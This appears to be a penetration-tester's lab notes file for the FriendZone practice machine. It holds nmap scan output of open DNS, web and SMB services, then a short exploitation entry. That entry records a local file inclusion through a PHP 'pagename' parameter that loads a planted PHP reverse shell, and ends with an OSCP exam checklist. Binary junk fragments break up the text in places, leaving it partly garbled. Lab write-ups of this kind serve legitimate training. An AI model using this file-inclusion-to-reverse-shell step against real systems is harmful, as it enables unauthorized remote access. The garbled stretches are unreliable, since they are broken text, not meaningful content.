custom-colors$A[3Qt:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519) 53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux) | dns-nsid: |_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Friend Zone Escape software 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 443/tcp open ssl/http Apache httpd 2.4.29 |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: 404 Not Found | ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO | Not valid before: 2018-10-05T21:02:30 |_Not valid after: 2018-11-04T21:02:30 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP) Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: -59m42s, deviation: 1h43m55s, median: 17s |_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: &#60;unknown>, NetBIOS MAC: &#60;unknown> (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.7.6-Ubuntu) | Computer name: friendzone | NetBIOS computer name: FRIENDZONE\x00 | Domain name: \x00 | FQDN: friendzone |_ System time: 2020-04-02T03:49:33+03:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-04-02T00:49:33 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 38.96 secondscustom-colors$A?&Aס|  4%'  ExploitationService Exploited: SMB and PHP Parameter Validation Vulnerability Type: Local File Inclusion LFI Exploit POC: Description: Discovery of Vulnerability Login to administrator1.friendzone.red Exploit Code Used pagename = /etc/Development/php-reverse-shell Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colors,Aס}4